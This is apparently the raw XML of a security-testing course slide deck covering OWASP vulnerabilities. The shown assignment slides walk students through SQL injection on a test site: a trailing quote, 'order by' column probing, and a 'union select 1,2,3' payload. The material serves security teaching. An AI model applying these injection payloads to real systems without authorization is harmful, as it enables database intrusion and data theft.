                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break the URL to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: use ‘ in the end and try]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83483604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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break the URL to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: use order by 1 in the URL end and try]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265371988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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break the URL to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: use order by 2, 3, 4, 5 in the URL end and understand what info is revealed]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1146821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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find the # of tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: click on an artist id and see the # of tables ; artist r4w8173, view pictures of the artist, comment on this artist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> there are 3 tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{56107FF3-6211-4FEA-9B86-4C6F8A053EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="5391848"/>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31740" rIns="0" bIns="82524"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Muli"/>
              </a:rPr>
              <a:t>Let’s penetrate more inside using union base injection to select statement from a different table.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="4C4F53"/>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4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3</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rgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>From the screenshot, you can see it is show result for only one table not for others.</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952226632"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_RetrospectVTI">
  <a:themeElements>
    <a:clrScheme name="Custom 37">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="4A5356"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E8E3CE"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="9BA8B7"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E6A02E"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BF6A3B"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="92987A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="857659"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A0988C"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00B0F0"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="738F97"/>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TWO.pptx" id="{769520F8-BFE5-4C8C-A7AA-375C025A91CE}" vid="{AEAFD717-D3C8-4034-8F7E-D5220B0CCEB8}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>{16351CB4-9C05-48B8-A226-71445ED399B5}tf56160789_win32</Template>
  <TotalTime>2606</TotalTime>
  <Words>3030</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>445</Paragraphs>
  <Slides>126</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126</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="136" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Fira Sans</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Muli</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_RetrospectVTI</vt:lpstr>
      <vt:lpstr>SECURITY TESTING</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>What is security testing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OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>INJECTION</vt:lpstr>
      <vt:lpstr>INJECTION</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>Broken Authentication &amp; Session Management </vt:lpstr>
      <vt:lpstr>Broken Authentication &amp; Session Management </vt:lpstr>
      <vt:lpstr>Broken Authentication &amp; Session Management </vt:lpstr>
      <vt:lpstr>Broken Authentication &amp; Session Management </vt:lpstr>
      <vt:lpstr>Broken Authentication &amp; Session Management </vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>SENSITIVE DATA EXPOSURE</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>INSUFFICIENT TLS</vt:lpstr>
      <vt:lpstr>INSUFFICIENT TLS</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>SECURITY MISCONFIGURATION</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>CSS/XSS</vt:lpstr>
      <vt:lpstr>CSS/XSS</vt:lpstr>
      <vt:lpstr>CSS/XSS</vt:lpstr>
      <vt:lpstr>CSS/XSS</vt:lpstr>
      <vt:lpstr>CSS/XSS</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>Using components with known vulnerabilities</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>OWASP VULNERABILITIES</vt:lpstr>
      <vt:lpstr>IDOR</vt:lpstr>
      <vt:lpstr>Unvalidated Redirects &amp; Forwards</vt:lpstr>
      <vt:lpstr>HTTP HEADERS</vt:lpstr>
      <vt:lpstr>REST API ATTRIBUTES</vt:lpstr>
      <vt:lpstr>Foot Print details of any web application or REST API</vt:lpstr>
      <vt:lpstr>Security Headers Testing</vt:lpstr>
      <vt:lpstr>Smoke Test Security Testing</vt:lpstr>
      <vt:lpstr>Smoke Test API Headers Security Testing</vt:lpstr>
      <vt:lpstr>Smoke Test to capture Ports Details</vt:lpstr>
      <vt:lpstr>Smoke Test Security Testing</vt:lpstr>
      <vt:lpstr>Burp Suite</vt:lpstr>
      <vt:lpstr>Burp Suite Proxy</vt:lpstr>
      <vt:lpstr>Burp Suite other features</vt:lpstr>
      <vt:lpstr>Quick Assignment#1</vt:lpstr>
